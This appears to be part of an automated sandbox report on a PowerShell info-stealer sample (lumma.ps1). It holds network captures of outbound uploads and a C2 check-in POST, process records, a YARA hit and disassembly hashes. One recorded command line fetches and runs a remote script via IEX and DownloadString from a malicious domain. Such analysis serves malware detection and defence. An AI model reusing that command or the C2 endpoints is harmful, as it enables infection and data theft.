                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4
                                                                                    Data Ascii: ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;wo
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb
                                                                                    Data Ascii: MnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>he
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87
                                                                                    Data Ascii: /-%.VYxh.f:.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}G
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be
                                                                                    Data Ascii: 7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70
                                                                                    Data Ascii: f+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a
                                                                                    Data Ascii: V~Rg}OET 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae
                                                                                    Data Ascii: Wsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6E
                                                                                    2024-12-30 08:19:32 UTC1139INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=0sqicqblk40qm93khe2btrnen5; expires=Fri, 25 Apr 2025 02:06:10 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pO5xDPir6JTTCng2jsYfE2bRgVV6ZjG8twzeb67HRK7UBtr%2Fm0IFjrp2drryHdcL%2Fm5BzxSnLqle3jamul7SkLeYoNZ379tGuH3UYrjIpyp0y%2B4WKRYn3iMpwKq5%2FcFoaQH7tQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09af45cb20f73-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1458&rtt_var=558&sent=200&recv=586&lost=0&retrans=0&sent_bytes=2844&recv_bytes=573503&delivery_rate=1940199&cwnd=233&unsent_bytes=0&cid=bafbab592c9d2cbf&ts=1474&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.449977104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:32 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 83
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:32 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 26 6a 3d 26 68 77 69 64 3d 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--singl5&j=&hwid=3F80F8A27EF79AB7BEBA0C6A975F1733
                                                                                    2024-12-30 08:19:32 UTC1133INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=7qn80i7mjvkccnpqreh07c399k; expires=Fri, 25 Apr 2025 02:06:11 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iIZgr6Dnasz%2BV0jr%2BngMMOCN4ekYUFdtGr62SVOXuRoJXY56JcpWeMxuo21eHDkMJbpnWyvBSRGEOqc67Ckhj0g4VjV%2BSqKVLY%2FtOFzVwvByPrdB2PdvIQmIw045rQ5bdV%2FLFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09b009fcf422f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1709&rtt_var=654&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=984&delivery_rate=1656267&cwnd=137&unsent_bytes=0&cid=8f3394f29b9ce5c8&ts=451&x=0"
                                                                                    2024-12-30 08:19:32 UTC54INData Raw: 33 30 0d 0a 72 42 52 64 70 65 39 57 78 30 4a 36 45 6f 4b 53 51 41 4f 7a 6f 30 73 59 68 71 4f 59 66 33 52 59 6a 74 64 6d 47 74 44 4e 6c 6b 58 33 53 51 3d 3d 0d 0a
                                                                                    Data Ascii: 30rBRdpe9Wx0J6EoKSQAOzo0sYhqOYf3RYjtdmGtDNlkX3SQ==
                                                                                    2024-12-30 08:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:03:17:55
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1"
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:03:17:55
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:03:18:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))}
                                                                                    Imagebase:0x9e0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.2613418529.0000000006E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:03:18:03
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:03:19:21
                                                                                    Start date:30/12/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                    Imagebase:0xad0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B8A38D4 Relevance: 4.8, Strings: 3, Instructions: 1093COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7y$x6y$x6y
                                                                                      • API String ID: 0-3474269624
                                                                                      • Opcode ID: f91fa66c8f23498f0c2764e409463e517dfb109a48b948bda94f74ea773d4880
                                                                                      • Instruction ID: 53a0ce36627147c9bda8debe042769315f8afa20cede14d88cf95b19946dcd9f
                                                                                      • Opcode Fuzzy Hash: f91fa66c8f23498f0c2764e409463e517dfb109a48b948bda94f74ea773d4880
                                                                                      • Instruction Fuzzy Hash: 0A724971A0FBC94FE7A6DB6848765A47BE1EF5A314F0900FED0498B0E3D929AC46C351
                                                                                      Function 00007FFD9B7DA136 Relevance: .5, Instructions: 473COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e05f2cc191c91581e8eef70185107331525c5d807261903a051ab14da2f4b364
                                                                                      • Instruction ID: f9e545cb2f04066268ae2913d78a753c6ec0a54c80be15c68f8bc3251ef6dfe3
                                                                                      • Opcode Fuzzy Hash: e05f2cc191c91581e8eef70185107331525c5d807261903a051ab14da2f4b364
                                                                                      • Instruction Fuzzy Hash: 71F19630A09B8D8FEBA8DF28C8557E977D1FF94350F04436AE84DC72A5DB34A9458B81
                                                                                      Function 00007FFD9B7DAEE2 Relevance: .5, Instructions: 460COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d55240a31e4ef2d23d66dc7975eae36ca86c93a4ca2992c0a92114b63a5e9e71
                                                                                      • Instruction ID: 7ac9966b88058725d4fa90b58346b906895ffc4923e643195be27554e1312a11
                                                                                      • Opcode Fuzzy Hash: d55240a31e4ef2d23d66dc7975eae36ca86c93a4ca2992c0a92114b63a5e9e71
                                                                                      • Instruction Fuzzy Hash: 4DE1D530A08A4E8FEBA8DF28C8557E977E1EF94350F04436ED84DC72A5DF34A9458B81
                                                                                      Function 00007FFD9B8A32A9 Relevance: .6, Instructions: 643COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e667717a19f927922afd42bc278c5fc9f576dd3cb232c87a21bdf731a259565
                                                                                      • Instruction ID: 32df1f78fdcc9a5a0554797011f1111038b25f35bca331cc940ea1b73bbfc92c
                                                                                      • Opcode Fuzzy Hash: 3e667717a19f927922afd42bc278c5fc9f576dd3cb232c87a21bdf731a259565
                                                                                      • Instruction Fuzzy Hash: 3C223672A0EA8D4FE7A5EB6888655787BE1FF59304B1900BED05DC71E3DE29AC42C311
                                                                                      Function 00007FFD9B8A3355 Relevance: .6, Instructions: 593COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c76abe4014c0b5552a9a63dec89d7ffd3ef65db41fe6d6bee6f449a8ade5709
                                                                                      • Instruction ID: e62c070c1a5e7255c536fffc0dcab014bae572579160c3223c8558364b7e307d
                                                                                      • Opcode Fuzzy Hash: 3c76abe4014c0b5552a9a63dec89d7ffd3ef65db41fe6d6bee6f449a8ade5709
                                                                                      • Instruction Fuzzy Hash: 99122572B0EA8D4FE7A5EB68886557877E2EF59314B1900BDD05DC71E3DD29AC028311
                                                                                      Function 00007FFD9B8A2435 Relevance: .4, Instructions: 420COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78f3aa1f62dce7c744e389fa920d58bf7be632e2ba02f50d9b6ebefcd77e1b83
                                                                                      • Instruction ID: ef3730b1edc1ea9ba3666f21c52d23709187f8d696a1e73495e30fe66f0ee17a
                                                                                      • Opcode Fuzzy Hash: 78f3aa1f62dce7c744e389fa920d58bf7be632e2ba02f50d9b6ebefcd77e1b83
                                                                                      • Instruction Fuzzy Hash: DFD13572A0FACD0FE7B5ABA848755A97BE1FF59354B0900FAD44DC70E3E918AD058321
                                                                                      Function 00007FFD9B7DAAF6 Relevance: .3, Instructions: 333COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e45220af5b624bb32916626688b557d7f8a77d9155ac1ed681a9a0edeb13f4c0
                                                                                      • Instruction ID: e8def7baa74ea1c307bcf0e456cb5b0bcf10b56d708119d4f40db735af4c83e9
                                                                                      • Opcode Fuzzy Hash: e45220af5b624bb32916626688b557d7f8a77d9155ac1ed681a9a0edeb13f4c0
                                                                                      • Instruction Fuzzy Hash: 6CB1D570609B8D4FDB68DF28C8557E93BE1FF95350F04426EE84DC72A6CA34A945CB82
                                                                                      Function 00007FFD9B8A405D Relevance: .3, Instructions: 263COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6b2c97ff832bce63863c4c51fdef57108f111c5e173a8586091b319bc4591534
                                                                                      • Instruction ID: c9156ae6325617c0eb9d8dcc69ff12d1fe77850663b64888e0ab41f9e7256c5b
                                                                                      • Opcode Fuzzy Hash: 6b2c97ff832bce63863c4c51fdef57108f111c5e173a8586091b319bc4591534
                                                                                      • Instruction Fuzzy Hash: 40912872B0EA894FEBA4DF6884762687BD1EF69314F1900BED049C71E3DD29AC45C351
                                                                                      Function 00007FFD9B8A2470 Relevance: .2, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22b889bf442e1ad99c555efa507db355340ad4bda10ecb4efed1b4ae1193ae08
                                                                                      • Instruction ID: 9aac072a8bcd2d0dd2917e24dda4cd85e5ddc9d71055670659e7f561e99b458f
                                                                                      • Opcode Fuzzy Hash: 22b889bf442e1ad99c555efa507db355340ad4bda10ecb4efed1b4ae1193ae08
                                                                                      • Instruction Fuzzy Hash: 1681F562B0FACA0FE7B5ABE849B51B47AD1BF59354B0900FAD449C71E3DC09AD448321
                                                                                      Function 00007FFD9B7D761C Relevance: .2, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f20b92f263d749c40af46b400da336b9f3608a63175840e3f580a38fbf3ccdc
